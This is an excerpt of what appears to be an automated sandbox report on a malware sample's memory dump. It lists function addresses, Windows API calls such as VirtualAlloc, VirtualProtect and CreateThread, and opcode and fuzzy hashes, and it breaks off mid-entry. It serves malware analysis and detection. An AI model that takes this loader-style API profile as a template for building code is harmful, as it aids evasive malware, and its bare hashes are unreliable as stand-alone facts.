                                                                                                                            Function 00231F58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 6a8ed87bcf0e59236ddbef0348ee125da03c90cd37ccd2b7c2bf74579bb87c8c
                                                                                                                            • Instruction ID: b4e4918b73231de077afd7453380209ab017ed3985eec5590f99093f13a64a07
                                                                                                                            • Opcode Fuzzy Hash: 6a8ed87bcf0e59236ddbef0348ee125da03c90cd37ccd2b7c2bf74579bb87c8c
                                                                                                                            • Instruction Fuzzy Hash: F451ACF6A34722DAFB1C52A4CD56BBC2512EBE0710F28E12DA343E9583CEEC44689910
                                                                                                                            Function 00231F6A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 214COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: c2566ed6df8e2a862ee5d7d024782d6e601238162e25fa7e902eaa86ddb86992
                                                                                                                            • Instruction ID: 8e4ecb22d3db65a7f38ff8f47668fc3003e4c317f8715ea9487af5c1e964df93
                                                                                                                            • Opcode Fuzzy Hash: c2566ed6df8e2a862ee5d7d024782d6e601238162e25fa7e902eaa86ddb86992
                                                                                                                            • Instruction Fuzzy Hash: 60518DF7A74722DAFB1C52A4CD66BBC2516E7D0710F28E52DA343E91C7CDEC44689910
                                                                                                                            Function 00231FA9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: e44e123d472ca776dadcfcb1c9fda16aa2fa90f9e914cf17207ec698cff7ed6e
                                                                                                                            • Instruction ID: 383667d6ffd92839c42c6a43828ab1bd69b0dc22cbcbeb1007246b81f0adb493
                                                                                                                            • Opcode Fuzzy Hash: e44e123d472ca776dadcfcb1c9fda16aa2fa90f9e914cf17207ec698cff7ed6e
                                                                                                                            • Instruction Fuzzy Hash: 9251ABF6A34722DAEB1C52A4CD56BBC7512EBE0711F28E12DA347E9187CEF804689910
                                                                                                                            Function 00231FDF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 4be6e374e4bff62eccc82c3c4f0442d863825646c38bb8042f3670b1aab00b6c
                                                                                                                            • Instruction ID: 8f4d7a4349490d568e7788745f75adf1e12b3fc16a7331c88b43dc1f1468f618
                                                                                                                            • Opcode Fuzzy Hash: 4be6e374e4bff62eccc82c3c4f0442d863825646c38bb8042f3670b1aab00b6c
                                                                                                                            • Instruction Fuzzy Hash: A541BBF6A34722DBFB1C52A4CD52BBC7512EBE0710F28A129A347E9187CDFC08689910
                                                                                                                            Function 00231FF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 01dd390c73c3bde259d133b3f7a808c51f21b1a22f27b22b1612d1d06215faaf
                                                                                                                            • Instruction ID: 0b4190ccbcce281528b9bc89d4e12da00fd5e6d0c7e0322eb624933a90064536
                                                                                                                            • Opcode Fuzzy Hash: 01dd390c73c3bde259d133b3f7a808c51f21b1a22f27b22b1612d1d06215faaf
                                                                                                                            • Instruction Fuzzy Hash: 0741BCF6A34722DBFB1C52B4CD56BBC7512EBE0710F28A129A347A91C7CDFC08689910
                                                                                                                            Function 00231052 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 155libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: d80d9dc7ffda5dca5966a78d390929dabf9720420496a113c08ff4b7d6eb3374
                                                                                                                            • Instruction ID: 0aa415c6dc973e58bc4be0e24904c5100e59f914efc106dd954bf3552af8c2e0
                                                                                                                            • Opcode Fuzzy Hash: d80d9dc7ffda5dca5966a78d390929dabf9720420496a113c08ff4b7d6eb3374
                                                                                                                            • Instruction Fuzzy Hash: 93416AF2E746528EEB0D9AA4CC953FDB665EB80301F28D53DCD43DA191CAF845B1DA10
                                                                                                                            Function 0023203D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 41788bd7fbca16d56cbdabdf3d951325aa2484f402744e1148dc19268bc07d1f
                                                                                                                            • Instruction ID: d845373e67de13163e7e82e80355799fadb208324ac8ef326377193e2081d8aa
                                                                                                                            • Opcode Fuzzy Hash: 41788bd7fbca16d56cbdabdf3d951325aa2484f402744e1148dc19268bc07d1f
                                                                                                                            • Instruction Fuzzy Hash: 3C4188F7A30622DBEB1C52A4CD66BBD2156EBE0710F2CE529A347E9187CDEC44688950
                                                                                                                            Function 0023107D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: 23c5c0ae02eb9a445498dce5c7033c986dd4260ba83f1d4e7b09b0f76b0120b9
                                                                                                                            • Instruction ID: 380b314e5c4780d77b2b149e7c0b9acd12a6ca11f41f049f5b15244b3d852b4a
                                                                                                                            • Opcode Fuzzy Hash: 23c5c0ae02eb9a445498dce5c7033c986dd4260ba83f1d4e7b09b0f76b0120b9
                                                                                                                            • Instruction Fuzzy Hash: 2D4178F2E746528EEB0D8AA4CC953FDB265EB80301F28D13DCE42DA191CAF845B1CA10
                                                                                                                            Function 00232053 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 06b12bca111a1b2aaabbaa3ac75fee9f351a8b48f410928c161474f983d098aa
                                                                                                                            • Instruction ID: 67bb67562b674500cfca907ff77cd14050f081c31757ec8697a8e5df646a372a
                                                                                                                            • Opcode Fuzzy Hash: 06b12bca111a1b2aaabbaa3ac75fee9f351a8b48f410928c161474f983d098aa
                                                                                                                            • Instruction Fuzzy Hash: 6531ABFBA30622DBEB1C52A4CD66B7D2156EBE0700F2CE529A347EA187CDEC44588950
                                                                                                                            Function 00232061 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 852d18017d3e2340b211304488258b738f7fbbae8db7b98aad9d11455063a82a
                                                                                                                            • Instruction ID: b060b7d97af34448fdcfbb02a0aba481e6064bb52160b25f362cdc455a75a771
                                                                                                                            • Opcode Fuzzy Hash: 852d18017d3e2340b211304488258b738f7fbbae8db7b98aad9d11455063a82a
                                                                                                                            • Instruction Fuzzy Hash: 59319AF7A30622EBEB1C12B4CD66B7D2156EBE0700F2CE539A34799187CDEC44588550
                                                                                                                            Function 0023172B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 7d96fabae2d3ccbe92d7649fcdb2c3e95c606fc3daaaab215139462d66ca8084
                                                                                                                            • Instruction ID: 19b285cd968693cebf0819353a2667da25d637f5b5412e9aead08009aefc683f
                                                                                                                            • Opcode Fuzzy Hash: 7d96fabae2d3ccbe92d7649fcdb2c3e95c606fc3daaaab215139462d66ca8084
                                                                                                                            • Instruction Fuzzy Hash: E9313CB3A301129BEB0C5BA8CD566BDF2A5E7D4711F2C952DE002EA186DF7C48749660
                                                                                                                            Function 002308CE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 149COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 1ee9b173d1b23e43e8b3b53350e6c332c44dbac0dab3fc048332c86b37f47f0a
                                                                                                                            • Instruction ID: 1b7c84241fd48ef74c05f55190074d151be97d245686ca0e1415c584240d319f
                                                                                                                            • Opcode Fuzzy Hash: 1ee9b173d1b23e43e8b3b53350e6c332c44dbac0dab3fc048332c86b37f47f0a
                                                                                                                            • Instruction Fuzzy Hash: C6410DB6E30326CBDF19CAA8DCA53BE7671FBC4701F285539C202B5141CAB84954C6B1
                                                                                                                            Function 0023090D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 24ffc371f46f0de56576e07489c72bc5483e5c5a794b096009c5791a276e725f
                                                                                                                            • Instruction ID: 8a0c3ee64a783c301f3f47d72b0aa315a830683b94504545abc2194323340fc3
                                                                                                                            • Opcode Fuzzy Hash: 24ffc371f46f0de56576e07489c72bc5483e5c5a794b096009c5791a276e725f
                                                                                                                            • Instruction Fuzzy Hash: 7E31A6B6E3132ACBDF19CEA8D9A82FEB6B1AF84701F284139C10676151CA741A54C6F1
                                                                                                                            Function 002308BD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: adc6efd2b932aaf2297a478b2ed613ec12978a31318a0243e848804abda470ea
                                                                                                                            • Instruction ID: bb16c6857e75f82348d5f3b57d1654567e5b623e321c50aece2d4174b1cceb2e
                                                                                                                            • Opcode Fuzzy Hash: adc6efd2b932aaf2297a478b2ed613ec12978a31318a0243e848804abda470ea
                                                                                                                            • Instruction Fuzzy Hash: 3C31D6B5E3132ACBDF19CEA8D9A82FEB6B0BF84701F284139C10276151CA741E54C6F1
                                                                                                                            Function 00230938 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 2c3dd29b98de14fc247514b6294b694b0177f5b73a4d53a0db72cb699a8fa6af
                                                                                                                            • Instruction ID: 6543d6caf6550961a84fbda2a35b45b3cd706ca408fb04dfac6ca73bd9481c81
                                                                                                                            • Opcode Fuzzy Hash: 2c3dd29b98de14fc247514b6294b694b0177f5b73a4d53a0db72cb699a8fa6af
                                                                                                                            • Instruction Fuzzy Hash: D02173B5E3132ACBDF19CEA8D9982FEB6B1BB84701F294239C20576150CA741E54C6F1
                                                                                                                            Function 00232091 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 70c5366eae1cca11daaad09f54bd33c86a0f7575d6d7609fb2b2a5b750baffe8
                                                                                                                            • Instruction ID: 449e80f75d264111357b629d59a222e0fdd5b01d0af2e3d3ff73ebd82646f21e
                                                                                                                            • Opcode Fuzzy Hash: 70c5366eae1cca11daaad09f54bd33c86a0f7575d6d7609fb2b2a5b750baffe8
                                                                                                                            • Instruction Fuzzy Hash: 4A317BF7A30A22E6FB1C2274CE66B79544AE7E0700F6CE53DA387D8187CCED04685460
                                                                                                                            Function 002320B8 Relevance: 3.1, APIs: 2, Instructions: 106threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: d74dc855914b7349c3b0d40e2db62c309a59be95aa08991b47927ae15319f3fb
                                                                                                                            • Instruction ID: 3a8c5a65054a8280fac4d3f6f9b6f398294be1e8b296e0f40aade806a97c2582
                                                                                                                            • Opcode Fuzzy Hash: d74dc855914b7349c3b0d40e2db62c309a59be95aa08991b47927ae15319f3fb
                                                                                                                            • Instruction Fuzzy Hash: 922145FB634A22D6EB1D22B4CE66B7D540AE7E0700F68E53DA387D8183CCDD00A85460
                                                                                                                            Function 002320F7 Relevance: 3.1, APIs: 2, Instructions: 86threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 9349f056b0b02ee25d4394e217fd01f95e6d08a6e456e14775c8b4b7317b2888
                                                                                                                            • Instruction ID: 5cad33ed6b63dc750dfdfab05c4a8ce8c9df5328595ae0ecb5382b7ab27dba0c
                                                                                                                            • Opcode Fuzzy Hash: 9349f056b0b02ee25d4394e217fd01f95e6d08a6e456e14775c8b4b7317b2888
                                                                                                                            • Instruction Fuzzy Hash: AC11CEF7A30A23D6EB1D23B8CE6A77D5406E7E0700F2CE53E978B88183CDD800A85460
                                                                                                                            Function 00232122 Relevance: 3.1, APIs: 2, Instructions: 74threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 6fa603f21a32fd82ace2bf48d055e2b0fa8e0f3ca1c3d1e55c02ee84f5a26be5
                                                                                                                            • Instruction ID: cd63bcd497d8fbff56450d58f769d65625f3a7f6b0fa1f7237168db7a85199c1
                                                                                                                            • Opcode Fuzzy Hash: 6fa603f21a32fd82ace2bf48d055e2b0fa8e0f3ca1c3d1e55c02ee84f5a26be5
                                                                                                                            • Instruction Fuzzy Hash: 2B116FF7634A23D6EF1D12B8CE65B7D5405E7E0700F68E539978B98197DCD8006C5460
                                                                                                                            Function 0023216C Relevance: 1.5, APIs: 1, Instructions: 45threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: 49143707107687e7b35d10633917b1b6a73f6eaea7c8d102e89f15c667ebe446
                                                                                                                            • Instruction ID: ea65d67206252ffdc72c700f6e9c5b87d3427a3003d7c2919f3606fe563283de
                                                                                                                            • Opcode Fuzzy Hash: 49143707107687e7b35d10633917b1b6a73f6eaea7c8d102e89f15c667ebe446
                                                                                                                            • Instruction Fuzzy Hash: 81F0B8FB670A2295FB1C22A0DD76B78000AE3E4701F68E83E6283D8682DCDD80905020
                                                                                                                            Function 0023176A Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00231797
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            • Opcode ID: 7fdecd4c65e739fd43d314d6a2364bc55c7da5283aaa43a512b286945ce32d55
                                                                                                                            • Instruction ID: b25fa0194a4348a8930f8dcd6c84a6a012a76a0ef4f5cfec357320c3d2632542
                                                                                                                            • Opcode Fuzzy Hash: 7fdecd4c65e739fd43d314d6a2364bc55c7da5283aaa43a512b286945ce32d55
                                                                                                                            • Instruction Fuzzy Hash: FAF0BBB7B351128BEB1CAA98DD551FDF2A1A7E4712F3CA52ED003A8382EFA905705560
                                                                                                                            Function 002321AB Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: d3effeb4ccc460ffd5b9c48fd513fce9e933a506ef15c2b4fcc5ee762b752ca6
                                                                                                                            • Instruction ID: 7d799e208526352e69521f93076fe8d06240286659df5f408eabf4347344cfde
                                                                                                                            • Opcode Fuzzy Hash: d3effeb4ccc460ffd5b9c48fd513fce9e933a506ef15c2b4fcc5ee762b752ca6
                                                                                                                            • Instruction Fuzzy Hash: 17E0C2B2730A23D5DB2C22A8CD6B2BCA456EBD0301F5CE81A4587DC193DAE441809060
                                                                                                                            Function 002321D6 Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: 71312a199818cdad98dca2d76468537e40c1af83ceb9d45bbc1a579e296ce153
                                                                                                                            • Instruction ID: 61f03ac7120b258d402ed533f7e17fa01bffeb4694d11a0f29e16d2dcdd01fc4
                                                                                                                            • Opcode Fuzzy Hash: 71312a199818cdad98dca2d76468537e40c1af83ceb9d45bbc1a579e296ce153
                                                                                                                            • Instruction Fuzzy Hash: 3CB092A273092244EE1C12B09D2B7E4804CA6E4B16F58A8564593C8497E8D882805040
                                                                                                                            Function 00231D50 Relevance: 1.4, APIs: 1, Instructions: 111COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 392fec7977bcdf7483cd8ab5539ebc7518d6027962b5e4dc8ab5698ccb8e65b3
                                                                                                                            • Instruction ID: 70b7fef99dad11ddae5798bb5e6f83cd5a92bf30e70f16b26b0f9990a38cf208
                                                                                                                            • Opcode Fuzzy Hash: 392fec7977bcdf7483cd8ab5539ebc7518d6027962b5e4dc8ab5698ccb8e65b3
                                                                                                                            • Instruction Fuzzy Hash: A1314EF5D302399EDF1D5A64CC51F7D7A32FB90704F1882B9D807A6151DBB14D319A90
                                                                                                                            Function 00231E0F Relevance: 1.3, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(?,998B1F24), ref: 00231E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.370932968.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction ID: c225a94fd12fe433039d9fde6172315fe83e0fb7a6822af79ad76f4c0217926d
                                                                                                                            • Opcode Fuzzy Hash: c0a395b92c7622aa0072517d91f8368763480b3ead5ee4e137e84abe63479980
                                                                                                                            • Instruction Fuzzy Hash: BB0149B5E3012A9AEF2D5B34CC59FBD7672FB90700F1882A9D84BE5042DB714A729E40
                                                                                                                            Function 00231E3A Relevance: 1.3, APIs: 1, Instructions: 46memoryCOMMON
                                                                                                                            Download Yara Rule
